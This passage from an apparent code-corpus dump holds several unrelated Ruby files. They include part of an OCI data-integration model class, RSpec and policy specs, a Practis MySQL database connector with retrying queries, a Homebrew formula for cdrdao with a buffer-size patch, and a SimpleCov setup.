end
# Attribute type mapping.
def self.swagger_types
{
# rubocop:disable Style/SymbolLiteral
'model_type': :'String',
'key': :'String',
'model_version': :'String',
'parent_ref': :'OCI::DataIntegration::Models::ParentReference',
'config_values': :'OCI::DataIntegration::Models::ConfigValues',
'object_status': :'Integer',
'name': :'String',
'description': :'String',
'type': :'Object',
'default_value': :'Object',
'root_object_default_value': :'Object',
'is_input': :'BOOLEAN',
'is_output': :'BOOLEAN',
'output_aggregation_type': :'String',
'type_name': :'String'
# rubocop:enable Style/SymbolLiteral
}
end
# rubocop:disable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity
# rubocop:disable Metrics/MethodLength, Layout/EmptyLines, Style/SymbolLiteral
# Initializes the object
# @param [Hash] attributes Model attributes in the form of hash
# @option attributes [String] :key The value to assign to the {OCI::DataIntegration::Models::TypedObject#key #key} proprety
# @option attributes [String] :model_version The value to assign to the {OCI::DataIntegration::Models::TypedObject#model_version #model_version} proprety
# @option attributes [OCI::DataIntegration::Models::ParentReference] :parent_ref The value to assign to the {OCI::DataIntegration::Models::TypedObject#parent_ref #parent_ref} proprety
# @option attributes [OCI::DataIntegration::Models::ConfigValues] :config_values The value to assign to the {OCI::DataIntegration::Models::TypedObject#config_values #config_values} proprety
# @option attributes [Integer] :object_status The value to assign to the {OCI::DataIntegration::Models::TypedObject#object_status #object_status} proprety
# @option attributes [String] :name The value to assign to the {OCI::DataIntegration::Models::TypedObject#name #name} proprety
# @option attributes [String] :description The value to assign to the {OCI::DataIntegration::Models::TypedObject#description #description} proprety
# @option attributes [Object] :type The value to assign to the {#type} property
# @option attributes [Object] :default_value The value to assign to the {#default_value} property
# @option attributes [Object] :root_object_default_value The value to assign to the {#root_object_default_value} property
# @option attributes [BOOLEAN] :is_input The value to assign to the {#is_input} property
# @option attributes [BOOLEAN] :is_output The value to assign to the {#is_output} property
# @option attributes [String] :output_aggregation_type The value to assign to the {#output_aggregation_type} property
# @option attributes [String] :type_name The value to assign to the {#type_name} property
def initialize(attributes = {})
return unless attributes.is_a?(Hash)
attributes['modelType'] = 'PARAMETER'
super(attributes)
# convert string to symbol for hash key
attributes = attributes.each_with_object({}) { |(k, v), h| h[k.to_sym] = v }
self.type = attributes[:'type'] if attributes[:'type']
self.default_value = attributes[:'defaultValue'] if attributes[:'defaultValue']
raise 'You cannot provide both :defaultValue and :default_value' if attributes.key?(:'defaultValue') && attributes.key?(:'default_value')
self.default_value = attributes[:'default_value'] if attributes[:'default_value']
self.root_object_default_value = attributes[:'rootObjectDefaultValue'] if attributes[:'rootObjectDefaultValue']
raise 'You cannot provide both :rootObjectDefaultValue and :root_object_default_value' if attributes.key?(:'rootObjectDefaultValue') && attributes.key?(:'root_object_default_value')
self.root_object_default_value = attributes[:'root_object_default_value'] if attributes[:'root_object_default_value']
self.is_input = attributes[:'isInput'] unless attributes[:'isInput'].nil?
raise 'You cannot provide both :isInput and :is_input' if attributes.key?(:'isInput') && attributes.key?(:'is_input')
self.is_input = attributes[:'is_input'] unless attributes[:'is_input'].nil?
self.is_output = attributes[:'isOutput'] unless attributes[:'isOutput'].nil?
raise 'You cannot provide both :isOutput and :is_output' if attributes.key?(:'isOutput') && attributes.key?(:'is_output')
self.is_output = attributes[:'is_output'] unless attributes[:'is_output'].nil?
self.output_aggregation_type = attributes[:'outputAggregationType'] if attributes[:'outputAggregationType']
raise 'You cannot provide both :outputAggregationType and :output_aggregation_type' if attributes.key?(:'outputAggregationType') && attributes.key?(:'output_aggregation_type')
self.output_aggregation_type = attributes[:'output_aggregation_type'] if attributes[:'output_aggregation_type']
self.type_name = attributes[:'typeName'] if attributes[:'typeName']
raise 'You cannot provide both :typeName and :type_name' if attributes.key?(:'typeName') && attributes.key?(:'type_name')
self.type_name = attributes[:'type_name'] if attributes[:'type_name']
end
# rubocop:enable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity
# rubocop:enable Metrics/MethodLength, Layout/EmptyLines, Style/SymbolLiteral
# Custom attribute writer method checking allowed values (enum).
# @param [Object] output_aggregation_type Object to be assigned
def output_aggregation_type=(output_aggregation_type)
# rubocop:disable Style/ConditionalAssignment
if output_aggregation_type && !OUTPUT_AGGREGATION_TYPE_ENUM.include?(output_aggregation_type)
OCI.logger.debug("Unknown value for 'output_aggregation_type' [" + output_aggregation_type + "]. Mapping to 'OUTPUT_AGGREGATION_TYPE_UNKNOWN_ENUM_VALUE'") if OCI.logger
@output_aggregation_type = OUTPUT_AGGREGATION_TYPE_UNKNOWN_ENUM_VALUE
else
@output_aggregation_type = output_aggregation_type
end
# rubocop:enable Style/ConditionalAssignment
end
# rubocop:disable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity, Layout/EmptyLines
# Checks equality by comparing each attribute.
# @param [Object] other the other object to be compared
def ==(other)
return true if equal?(other)
self.class == other.class &&
model_type == other.model_type &&
key == other.key &&
model_version == other.model_version &&
parent_ref == other.parent_ref &&
config_values == other.config_values &&
object_status == other.object_status &&
name == other.name &&
description == other.description &&
type == other.type &&
default_value == other.default_value &&
root_object_default_value == other.root_object_default_value &&
is_input == other.is_input &&
is_output == other.is_output &&
output_aggregation_type == other.output_aggregation_type &&
type_name == other.type_name
end
# rubocop:enable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity, Layout/EmptyLines
# @see the `==` method
# @param [Object] other the other object to be compared
def eql?(other)
self == other
end
# rubocop:disable Metrics/AbcSize, Layout/EmptyLines
# Calculates hash code according to all attributes.
# @return [Fixnum] Hash code
def hash
[model_type, key, model_version, parent_ref, config_values, object_status, name, description, type, default_value, root_object_default_value, is_input, is_output, output_aggregation_type, type_name].hash
end
# rubocop:enable Metrics/AbcSize, Layout/EmptyLines
# rubocop:disable Metrics/AbcSize, Layout/EmptyLines
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def build_from_hash(attributes)
return nil unless attributes.is_a?(Hash)
self.class.swagger_types.each_pair do |key, type|
if type =~ /^Array<(.*)>/i
# check to ensure the input is an array given that the the attribute
# is documented as an array but the input is not
if attributes[self.class.attribute_map[key]].is_a?(Array)
public_method("#{key}=").call(
attributes[self.class.attribute_map[key]]
.map { |v| OCI::Internal::Util.convert_to_type(Regexp.last_match(1), v) }
)
end
elsif !attributes[self.class.attribute_map[key]].nil?
public_method("#{key}=").call(
OCI::Internal::Util.convert_to_type(type, attributes[self.class.attribute_map[key]])
)
end
# or else data not found in attributes(hash), not an issue as the data can be optional
end
self
end
# rubocop:enable Metrics/AbcSize, Layout/EmptyLines
# Returns the string representation of the object
# @return [String] String presentation of the object
def to_s
to_hash.to_s
end
# Returns the object in the form of hash
# @return [Hash] Returns the object in the form of hash
def to_hash
hash = {}
self.class.attribute_map.each_pair do |attr, param|
value = public_method(attr).call
next if value.nil? && !instance_variable_defined?("@#{attr}")
hash[param] = _to_hash(value)
end
hash
end
private
# Outputs non-array value in the form of hash
# For object, use to_hash. Otherwise, just return the value
# @param [Object] value Any valid value
# @return [Hash] Returns the value in the form of hash
def _to_hash(value)
if value.is_a?(Array)
value.compact.map { |v| _to_hash(v) }
elsif value.is_a?(Hash)
{}.tap do |hash|
value.each { |k, v| hash[k] = _to_hash(v) }
end
elsif value.respond_to? :to_hash
value.to_hash
else
value
end
end
end
end
# rubocop:enable Lint/UnneededCopDisableDirective, Metrics/LineLength
| 43.750853 | 245 | 0.696076 |
280a4c04481d96fa29be4f3cd55202e7f52766f5 | 126 | require 'rails_helper'
RSpec.describe PetSkill, type: :model do
pending "add some examples to (or delete) #{__FILE__}"
end
| 21 | 56 | 0.746032 |
390ff8edc62a3198efeeedbc36bbd5b3a8af1681 | 119 | class EventSerializer < ActiveModel::Serializer
attributes :id, :title, :content, :entity, :schedule, :lat, :lng
end
| 29.75 | 66 | 0.739496 |
4a89534ec318bd23ec0dca5eecf4c42a510e5d7a | 993 | require 'spec_helper'
RSpec.describe NotificationPolicy, type: :policy do
let(:user){ }
let(:record){ create :notification }
subject{ NotificationPolicy.new user, record }
context 'without a user' do
it_behaves_like 'a policy forbidding', :index, :show, :create, :update, :destroy
end
context 'with a user' do
let(:user){ create :user }
it_behaves_like 'a policy permitting', :index
it_behaves_like 'a policy forbidding', :show, :create, :update, :destroy
end
context 'with the owner' do
let(:user){ record.user }
it_behaves_like 'a policy permitting', :index, :show, :update
it_behaves_like 'a policy forbidding', :create, :destroy
end
context 'with scope' do
let!(:other_records){ create_list :notification, 2 }
let(:user){ create :user }
let(:records){ create_list :notification, 2, user: user }
subject{ NotificationPolicy::Scope.new(user, Notification).resolve }
it{ is_expected.to match_array records }
end
end
| 30.090909 | 84 | 0.696878 |
6aae233d33681f23b3e251b837fc20acc400ad18 | 30,527 | #!/usr/bin/env ruby
# -*- coding: utf-8 -*-
require 'rubygems'
require 'json'
require 'mysql2'
require 'timeout'
##<<<[2013/09/04 I.Noda]
## for exclusive connection use
require 'thread'
##>>>[2013/09/04 I.Noda]
require 'practis'
require 'practis/database'
require 'practis/database_command'
require 'practis/database_parser'
module Practis
module Database
#=== Database connector.
class DatabaseConnector
include Practis
# a hash that stores connectors to all kinds of databases
attr_reader :connectors
# storing database schema
attr_reader :database_parser
#=== initialize method.
#database_file :: a database configuration file
def initialize(database_file)
@connectors = {}
@database_parser = Practis::Database::DatabaseParser.new(database_file)
@database_parser.parse
end
def setup_database(paramDefs, result_set, config)
# add parameter fields to parameter table
paramDefs.each do |paramDef|
if (type_field = type_to_sqltype(paramDef.type.to_s)).nil?
error("type field requires any types. #{paramDef}")
next
end
if @database_parser.add_field(
config.read("#{DB_PARAMETER}_database_name"),
config.read("#{DB_PARAMETER}_database_tablename"),
# [2013/09/08 I.Noda] for speed up in large-scale sim.
#{field: paramDef.name, type: type_field, null: "NO"}
{field: paramDef.name, type: type_field, null: "NO", key: "MUL"}
) < 0
error("fail to add a filed. #{paramDef.name}, #{type_field}")
end
end
# add result fields to result table
result_set.each do |r|
if (type_field = type_to_sqltype(r[1])).nil?
error("type field requires any types. #{r}")
next
end
if @database_parser.add_field(
config.read("#{DB_RESULT}_database_name"),
config.read("#{DB_RESULT}_database_tablename"),
{field: r[0], type: type_field, null: r[2]}
) < 0
error("fail to add a field. #{r[0]}, #{type_field}")
end
end
database_check(config)
end
def create_node(arg_hash)
connector = @connectors[:node]
if (retval = connector.insert_record(arg_hash)).length != 0
error("fail to add node. errno: #{retval}")
return -1
end
return 0
end
def database_check(config)
DATABASE_LIST.each do |name|
# create a management database connector
db = nil
if (dbtype = config.read("#{name}_database_type")) == "mysql"
db = Practis::Database::MysqlConnector.new(
@database_parser.database_set,
config.read("#{name}_database_hostname"),
config.read("#{name}_database_management_username"),
config.read("#{name}_database_management_password"))
elsif dbtype == "mongo"
db = Practis::Database::MongoConnector.new(
@database_parser.database_set,
config.read("#{name}_database_hostname"),
config.read("#{name}_database_management_username"),
config.read("#{name}_database_management_password"))
else
error("currently MySQL and Mongo are supported, but #{dbtype} is " +
"not supported.")
end
if db.nil?
error("invalid database type: #{dbtype}")
next
end
# create a database
db_name = config.read("#{name}_database_name")
if db.exist_database?(db_name)
warn("database: #{db_name} already exists.")
else
if db.create_database(db_name) < 0
error("fail to create database :#{db_name}")
next
end
end
if db.update_setting(db_name, config.read("#{name}_database_username")) < 0
error("fail to set network config or authentification.")
next
end
# create a table
tbl_name = config.read("#{name}_database_tablename")
if db.exist_table?(db_name, tbl_name)
warn("table: #{tbl_name} already exist.")
else
if db.create_table(db_name, tbl_name) < 0
error("fail to create table: #{tbl_name}.")
next
end
end
db.close
case dbtype
when "mysql"
connectors[name.to_sym] = Practis::Database::MysqlConnector.new(
@database_parser.database_set,
config.read("#{name}_database_hostname"),
config.read("#{name}_database_username"),
config.read("#{name}_database_password"),
config.read("#{name}_database_name"),
config.read("#{name}_database_tablename"),
config.read("database_query_retry").to_i
)
when "mongo"
connectors[name.to_sym] = Practis::Database::MongoConnector.new(
@database_parser.database_set,
config.read("#{name}_database_hostname"),
config.read("#{name}_database_username"),
config.read("#{name}_database_password"),
config.read("#{name}_database_name"),
config.read("#{name}_database_tablename")
)
end
end
end
def insert_record(type, arg_hash)
if (connector = get_connector(type)).nil?
error("invalid type: #{type}")
return [nil]
end
connector.insert_record(arg_hash)
end
##--------------------------------------------------
##--- read_record(type, [condition]) {|result| ...}
## Send query to get data wrt condition.
## If ((|&block|)) is given, the block is called with
## ((|result|)) data of the query.
## If ((|&block|)) is not given, it return an Array of the
## result.
def read_record(type, condition = nil, &block)
if (connector = get_connector(type)).nil?
error("invalid type: #{type}")
return []
end
connector.read_record(condition,&block)
end
def inner_join_record(arg_hash)
# debug(arg_hash)
bcon = @connectors[arg_hash[:base_type]]
rcon = @connectors[arg_hash[:ref_type]]
condition = "#{rcon.database}.#{rcon.table} ON #{bcon.database}." +
"#{bcon.table}.#{arg_hash[:base_field]} = #{rcon.database}." +
"#{rcon.table}.#{arg_hash[:ref_field]}"
bcon.inner_join_record(condition)
end
def read_time(type = nil)
type ||= :project
connector = @connectors[type]
timeval = nil
unless (retval = connector.read({type: "runixtime"})).nil?
retval.each { |r| r.values.each { |v| timeval = v.to_i } }
end
if timeval.nil?
error("fail to get current time from the #{type} database.")
return nil
end
return timeval
end
## [2013/09/07 I.Noda]
##---read_max(type, record, valueType, condition)
## retrieve max value of ((|record|)) in database ((|type|))
## under ((|condition|)).
## valueType is :integer, :float, or nil.
def read_max(type, record, valueType, condition = nil)
connector = @connectors[type]
maxval = nil
unless (retval = connector.read({type: "rmax", record: record},
condition)).nil?
retval.each { |r| r.values.each { |v|
maxval = (valueType == :integer ? v.to_i :
valueType == :float ? v.to_f :
v)
}}
end
if maxval.nil?
error("fail to get max value of #{record} from the #{type} database.")
return nil
end
return maxval
end
## [2013/09/08 I.Noda]
##---read_count(type, condition)
## get count of data under ((|condition|)) in database ((|type|))
def read_count(type, condition = nil)
connector = @connectors[type]
count = nil
retval = connector.read({type: "rcount"},
condition){|retval|
retval.each { |r| r.values.each { |v| count = v.to_i } }
}
if count.nil?
error("fail to get count from the #{type} database.")
return nil
end
return count
end
def register_project(project_name)
connector = @connectors[:project]
id = rand(MAX_PROJECT)
if (retval = connector.read_record).length == 0
while connector.insert_record(
{project_id: id, project_name: project_name}).length != 0
id = rand(MAX_PROJECT)
end
else
ids = retval.select { |r| r["project_name"] == project_name }
if ids.length != 1
error("invalid project records")
ids.each { |i| error(i) }
return -1
end
id = ids[0]["project_id"]
end
return id
end
#=== check existing execution and register
def register_execution(execution_name, project_id, executable_command)
connector = @connectors[:execution]
id = rand(MAX_EXECUTION)
# if (retval = connector.read_record(
# "project_id = #{project_id}")).length == 0
if (retval = connector.read_record([:eq, [:field, "project_id"],
project_id])).length == 0
while connector.insert_record(
{execution_id: id,
execution_name: execution_name,
project_id: project_id,
executable_command: executable_command,
execution_status: 'empty',
execution_progress: 0.0,
number_of_node: 0,
number_of_parameter: 0,
finished_parameter: 0,
executing_parameter: 0}).length != 0
id = rand(MAX_EXECUTION)
end
else
#retval.each { |r| debug(r) }
ids = retval.select { |r| r["execution_name"] == execution_name }
if ids.length != 1
error("invalid execution records")
return -1
end
id = ids[0]["execution_id"]
end
return id
end
#=== check the node database.
def check_previous_node_database(my_node_id, execution_id, address)
connector = @connectors[:node]
prev_nodes = []
# check nodes of previous execution
unless (retval = connector.read_record).length == 0
retval.each do |r|
node_id = r["node_id"]
# If same id node exists, delete it.
if my_node_id == node_id
# unless (dretval = connector.delete_record(
# "node_id = #{my_node_id}")).nil?
unless (dretval =
connector.delete_record([:eq, [:field, "node_id"],
my_node_id])).nil?
dretval.each { |dr| warn(dr) }
end
else
# unless (uretval = connector.update_record(
# {queueing: 0,
# executing: 0,
# state: NODE_STATE_FINISH},
# "node_id = #{node_id}")).nil?
unless (uretval =
connector.update_record({ queueing: 0,
executing: 0,
state: NODE_STATE_FINISH},
[:eq, [:field, "node_id"],
node_id])).nil?
uretval.each { |ur| warn(ur) }
end
prev_nodes << {parent: r["parent"], state: NODE_STATE_FINISH,
node_type: r["node_type"], address: r["address"], id: node_id,
parallel: r["parallel"]}
end
end
end
# register manager node
if (ret = connector.insert_record(
{node_id: my_node_id,
node_type: NODE_TYPE_MANAGER,
execution_id: execution_id,
parent: 0,
address: address,
parallel: 1,
queueing: 0,
executing: 0,
state: NODE_STATE_RUNNING})).length != 0
error("fail to insert manager node.")
ret.each { |r| error(r) }
end
return prev_nodes
end
#=== check the parameter and result database
def check_previous_result_database
rconnector = @connectors[:result]
pconnector = @connectors[:parameter]
results = rconnector.read_record
parameters = pconnector.read_record
finished_parameters = []
finished_parameter_ids = []
#[2013/09/24 I.Noda] for speed up
parameterIdTable = {}
parameters.each{|p|
id = p["parameter_id"].to_i ;
parameterIdTable[id] = (parameterIdTable[id] || Array.new).push(p) ;
}
results.each do |r|
# ps = parameters.select { |p|
# p["parameter_id"].to_i == r["result_id"].to_i }
ps = parameterIdTable[r["result_id"].to_i] ;
ps.each do |p|
if p["state"] != PARAMETER_STATE_FINISH
# unless (retval = pconnector.update_record(
# #{:state => PARAMETER_STATE_READY},
# {state: PARAMETER_STATE_FINISH},
# "parameter_id = #{r["result_id"].to_i}")).nil?
unless (retval =
pconnector.update_record({state: PARAMETER_STATE_FINISH},
[:eq, [:field, "parameter_id"],
r["result_id"].to_i])).nil?
retval.each { |ret| warn(ret) }
end
end
finished_parameters << p
finished_parameter_ids << p["parameter_id"].to_i
end
end
parameters.each do |p|
if p["state"] != PARAMETER_STATE_FINISH &&
!finished_parameter_ids.include?(p["parameter_id"].to_i)
# unless (retval = pconnector.delete_record(
# "parameter_id = #{p["parameter_id"].to_i}")).nil?
unless (retval =
pconnector.delete_record([:eq, [:field, "parameter_id"],
p["parameter_id"].to_i])).nil?
retval.each { |ret| warn(ret) }
end
end
end
return finished_parameters
end
def update_record(type, arg_hash, condition)
if (connector = get_connector(type)).nil?
error("invalid type: #{type}")
return []
end
connector.update_record(arg_hash, condition)
end
def update_parameter(arg_hash, condition)
connector = @connectors[:parameter]
unless (retval = connector.update_record(arg_hash, condition)).nil?
error("fail to update the parameter record.")
retval.each { |r| error(r) }
return -1
end
return 0
end
# [2013/09/08 I.Noda] !!!! need to improve.
# most of operations in this methods should be done on DB,
# instead of on-memory.
def update_parameter_state(expired_timeout)
pconnector = @connectors[:parameter]
rconnector = @connectors[:result]
finished_parameters = []
if (timeval = read_time(:parameter)).nil?
error("fail to get current time from the parameter database.")
return nil, nil, nil, nil, nil
end
parameters = pconnector.read_record # current executing parameters
results = rconnector.read_record # current stored results
# count the number of the parameter each state.
# [2013/09/24 I.Noda] change for speed up
p_ready = p_alloc = p_execu = p_finis = 0 ;
parameters.each{|p|
case(p["state"])
when PARAMETER_STATE_READY then p_ready += 1 ;
when PARAMETER_STATE_ALLOCATING then p_alloc += 1 ;
when PARAMETER_STATE_EXECUTING then p_execu += 1 ;
when PARAMETER_STATE_FINISH then p_finis += 1 ;
end
}
# p_ready = parameters.select { |p|
# p["state"] == PARAMETER_STATE_READY }.length
# p_alloc = parameters.select { |p|
# p["state"] == PARAMETER_STATE_ALLOCATING }.length
# p_execu = parameters.select { |p|
# p["state"] == PARAMETER_STATE_EXECUTING }.length
# p_finis = parameters.select { |p|
# p["state"] == PARAMETER_STATE_FINISH }.length
# [2013/09/24 I.Noda] change for speed up
resultIdTable = {} ;
results.each{|r|
id = r["result_id"].to_i;
resultIdTable[id] = (resultIdTable[id] || Array.new()).push(r)
}
# parameters.select { |p| p["state"] == PARAMETER_STATE_EXECUTING }
# .each do |p|
parameters.each do |p|
next if (p["state"] != PARAMETER_STATE_EXECUTING) ;
# if (results.select { |r| p["parameter_id"] == r["result_id"] })
# .length > 0
if(resultIdTable[p["parameter_id"].to_i]) then
# if (retval = pconnector.update_record(
# {state: PARAMETER_STATE_FINISH},
# "parameter_id = #{p["parameter_id"]}")).length != 0
if (retval =
pconnector.update_record({state: PARAMETER_STATE_FINISH},
[:eq, [:field, "parameter_id"],
p["parameter_id"]])).length != 0
error("fail to update the parameter state")
retval.each { |r| error(r) }
next
end
p_execu -= 1
p_finis += 1
finished_parameters << p["parameter_id"].to_i
else # check the executing parameter is expired?
if timeval - p["execution_start"].to_i > expired_timeout
# if (retval = pconnector.update_record(
# {allocation_start: nil,
# execution_start: nil,
# state: PARAMETER_STATE_READY},
# "parameter_id = #{p["parameter_id"]}")).length != 0
if (retval =
pconnector.update_record({ allocation_start: nil,
execution_start: nil,
state: PARAMETER_STATE_READY},
[:eq, [:field, "parameter_id"],
p["parameter_id"]])).length != 0
error("fail to update the expired parameter.")
retval.each { |r| error(r) }
end
p_execu -= 1
p_ready += 1
end
end
end
return p_ready, p_alloc, p_execu, p_finis, finished_parameters
end
def close
DATABASE_LIST.each { |l| @connectors[l.to_sym].close }
end
private
def get_connector(type)
case type
when :project then @connectors[:project]
when :execution then @connectors[:execution]
when :executable then @connectors[:executable]
when :node then @connectors[:node]
when :parameter then @connectors[:parameter]
when :result then @connectors[:result]
else nil
end
end
def create(type, arg_hash, condition)
if (conn = get_connector(type)).nil?
error("invalid database type.")
return nil
end
return conn.create(arg_hash, condition)
end
def read(type, arg_hash, condition)
if (conn = get_connector(type)).nil?
error("invalid database type.")
return nil
end
return conn.read(arg_hash, condition)
end
def update(type, arg_hash, condition)
if (conn = get_connector(type)).nil?
error("invalid database type.")
return nil
end
return conn.update(arg_hash, condition)
end
def delete(type, arg_hash, condition)
if (conn = get_connector(type)).nil?
error("invalid database type.")
return nil
end
return conn.delete(arg_hash, condition)
end
end
#=== MySQL database connector.
#Simple mysql database connection functionality is provided with this class.
class MysqlConnector
include Practis
attr_reader :command_generator
attr_reader :hostname, :username, :database, :table
#def initialize
#query_retry :: if SQL failed, how many times it retry the query. if this
#value is negative, it eternally retries.
def initialize(schema, hostname, username, password, database = nil,
table = nil, query_retry = QUERY_RETRY_TIMES)
@command_generator = Practis::Database::MysqlCommandGenerator.new(
schema)
@hostname = hostname
@username = username
@password = password
@database = database
@table = table
@query_retry = query_retry
##<<<[2013/09/04 I.Noda]
## for exclusive connection use
@mutex = Mutex.new() ;
##>>>[2013/09/04 I.Noda]
connect
end
#=== Specified database exist? or not.
#database :: database name.
#returned_value :: If exist, it returns true. Otherwise, it returns false.
def exist_database?(database)
unless (retval = query(@command_generator.get_command(
nil, nil, {type: "rdatabase"}))).nil?
return retval.inject(false) { |b, r| b || r["Database"] == database }
end
return false
end
def exist_table?(database, table)
unless (retval = query(@command_generator.get_command(
database, nil, {type: "rtable"}))).nil?
return retval.inject(false) { |b, r|
b || r["Tables_in_#{database}"] == table }
end
return false
end
def exist_record?(key, value)
if (retval = query(@command_generator.get_command(
@database, @table, {type: "rrecord"}))).nil?
debug("specified table has no record.")
else
retval.each do |r|
if r[key] == value
return true
end
end
end
return false
end
def create_database(database)
# create database
unless (retval = query(@command_generator.get_command(
database, nil, {type: "cdatabase"}))).nil?
warn("fail to create database: #{database}")
retval.each { |r| warn(r) }
return -1
end
return 0
end
def update_setting(database, username)
# set network configuration
unless (retval = query(@command_generator.get_command(
database, nil, {type: "uglobal"}))).nil?
warn("fail to set global options to database: #{database}.")
retval.each { |r| warn(r) }
return -1
end
# set authentification
unless (retval = query(@command_generator.get_command(
database, nil, {type: "cgrant", username: username}))).nil?
warn("fail to set grant global option to database: #{database}.")
retval.each { |r| warn(r) }
return -2
end
unless (retval = query(@command_generator.get_command(
database, nil, {type: "cgrantl", username: username}))).nil?
warn("fail to set grant local option to database: #{database}.")
retval.each { |r| warn(r) }
return -3
end
return 0
end
def create_table(database, table)
com = @command_generator.get_command(database, table,
{type: "ctable"}) ;
# debug("create_table:com=#{com}") ;
unless (retval = query(com)).nil?
warn("fail to create table: #{table}.")
retval.each { |r| warn(r) }
return -1
end
return 0
end
def insert_record(arg_hash)
arg_hash[:type] = "cinsert"
# <<< [2013/09/05 I.noda]
#retq = query(@command_generator.get_command(
# @database, @table, arg_hash))
#retq.nil? ? [] : retq.inject([]) { |r, q| r << q }
query(@command_generator.get_command(@database, @table, arg_hash)){
|retq|
return retq.nil? ? [] : retq.inject([]) { |r, q| r << q }
}
# >>> [2013/09/05 I.noda]
end
##--------------------------------------------------
##--- read_record([condition]) {|result| ...}
## send query to get data wrt condition.
## If ((|&block|)) is given, the block is called with
## ((|result|)) data of the query.
## If ((|&block|)) is not given, it return an Array of the
## result.
def read_record(condition = nil,&block)
# <<< [2013/09/05 I.noda]
#retq = query(@command_generator.get_command(
# @database, @table, {type: "rrecord"}, condition))
#retq.nil? ? [] : retq.inject([]) { |r, q| r << q }
# [2013/09/08 I.Noda] use Array.new instead of [] for safety.
if(block.nil?)
query(@command_generator.get_command(@database, @table,
{type: "rrecord"}, condition)){
|retq|
result = Array.new()
return retq.nil? ? result : retq.inject(result) { |r, q| r << q }
}
else
query(@command_generator.get_command(@database, @table,
{type: "rrecord"}, condition),
&block) ;
end
# <<< [2013/09/05 I.noda]
end
def delete_record(condition = nil)
# <<< [2013/09/05 I.noda]
#retq = query(@command_generator.get_command(
# @database, @table, {type: "drecord"}, condition))
#retq.nil? ? [] : retq.inject([]) { |r, q| r << q }
query(@command_generator.get_command(@database, @table,
{type: "drecord"}, condition)){
|retq|
return retq.nil? ? [] : retq.inject([]) { |r, q| r << q }
}
# <<< [2013/09/05 I.noda]
end
def update_record(arg_hash, condition = nil)
arg_hash[:type] = "urecord"
# <<< [2013/09/05 I.noda]
#retq = query(@command_generator.get_command(
# @database, @table, arg_hash, condition))
#retq.nil? ? [] : retq.inject([]) { |r, q| r << q }
query(@command_generator.get_command(@database, @table,
arg_hash, condition)){
|retq|
return retq.nil? ? [] : retq.inject([]) { |r, q| r << q }
}
# <<< [2013/09/05 I.noda]
end
def inner_join_record(condition = nil)
# <<< [2013/09/05 I.noda]
#retq = query(@command_generator.get_command(
# @database, @table, {type: "rinnerjoin"}, condition))
#retq.nil? ? [] : retq.inject([]) { |r, q| r << q }
query(@command_generator.get_command(@database, @table,
{type: "rinnerjoin"}, condition)){
|retq|
return retq.nil? ? [] : retq.inject([]) { |r, q| r << q }
}
# <<< [2013/09/05 I.noda]
end
def read(arg_hash, condition = nil, &block)
com = @command_generator.get_command(@database, @table,
arg_hash, condition)
# info(arg_hash.inspect) ;
# info(com) ;
query(com, &block)
end
#=== Close the database connection.
def close
begin
@connector.close
rescue Exception => e
error("failed to close the database connection. #{e.message}")
error(e.backtrace)
raise e
end
end
private
#=== Connect to the database.
def connect
begin
if @database
@connector = Mysql2::Client::new(
host: @hostname,
username: @username,
password: @password,
database: @database
)
else
@connector = Mysql2::Client::new(
host: @hostname,
username: @username,
password: @password
)
end
rescue Exception => e
error("failed to connect database. #{e.message}")
error(e.backtrace)
raise e
end
end
#=== Execute a query.
#query_string :: mysql query.
#returned value :: Mysql2 Result objects.
def query(query_string, option = nil, &block)
c = @query_retry
while true
@mutex.synchronize(){ ###<<<[2013/09/04 I.Noda] for exclusive call>>>
begin
## <<< [2013/09/05 I.Noda]
## to introduce block call
res = nil ;
if option.nil?
res = @connector.query(query_string)
else
res = @connector.query(query_string, option)
end
if(block) then
return block.call(res) ;
else
return res ;
end
## >>> [2013/09/05 I.Noda]
rescue Mysql2::Error => e
error("failed to run query. #{e.message}")
error("failed query: #{query_string}")
error(e.backtrace)
sleep(QUERY_RETRY_DURATION)
raise e if c == 0
end
} ###<<<[2013/09/04 I.Noda]>>>
c -= 1
end
end
def create(type, arg_hash, condition)
if (conn = get_connector(type)).nil?
error("invalid database type.")
return nil
end
return conn.create(arg_hash, condition)
end
end
class MongoConnector
end
end
end
| 36.298454 | 85 | 0.519671 |
62b6d3d338bf6efa41b0cfee90905d4ec33bee2f | 1,759 | class Cdrdao < Formula
desc "Record CDs in Disk-At-Once mode"
homepage "http://cdrdao.sourceforge.net/"
url "https://downloads.sourceforge.net/project/cdrdao/cdrdao/1.2.3/cdrdao-1.2.3.tar.bz2"
sha256 "8193cb8fa6998ac362c55807e89ad0b3c63edc6b01afaeb3d5042519527fb75e"
depends_on "pkg-config" => :build
depends_on "libao"
depends_on "libvorbis"
depends_on "mad"
depends_on "lame"
fails_with :llvm do
build 2326
cause "Segfault while linking"
end
# first patch fixes build problems under 10.6
# see https://sourceforge.net/p/cdrdao/patches/23/
patch do
url "https://sourceforge.net/p/cdrdao/patches/_discuss/thread/205354b0/141e/attachment/cdrdao-mac.patch"
sha256 "ee1702dfd9156ebb69f5d84dcab04197e11433dd823e80923fd497812041179e"
end
# second patch fixes device autodetection on OS X
# see https://trac.macports.org/ticket/27819
# upstream bug report:
# https://sourceforge.net/p/cdrdao/bugs/175/
patch :p0, :DATA
def install
system "./configure", "--disable-debug", "--disable-dependency-tracking",
"--prefix=#{prefix}", "--mandir=#{man}"
system "make", "install"
end
end
__END__
--- dao/main.cc 2013-11-26 12:00:00.000000000 -0400
+++ dao/main.cc 2013-11-26 12:00:00.000000000 -0400
@@ -1242,7 +1242,7 @@
const char* getDefaultDevice(DaoDeviceType req)
{
int i, len;
- static char buf[128];
+ static char buf[1024];
// This function should not be called if the command issues
// doesn't actually require a device.
@@ -1270,7 +1270,7 @@
if (req == NEED_CDRW_W && !rww)
continue;
- strncpy(buf, sdata[i].dev.c_str(), 128);
+ strncpy(buf, sdata[i].dev.c_str(), 1024);
delete[] sdata;
return buf;
}
| 29.813559 | 108 | 0.678226 |
4a0385703d3a3a9b70dc607184ce0bae3e6013d9 | 544 | # frozen_string_literal: true
require 'simplecov'
require 'simplecov-cobertura'
SimpleCov.formatter = SimpleCov::Formatter::CoberturaFormatter
SimpleCov.start do
add_filter '/spec/'
add_filter '/features/'
end
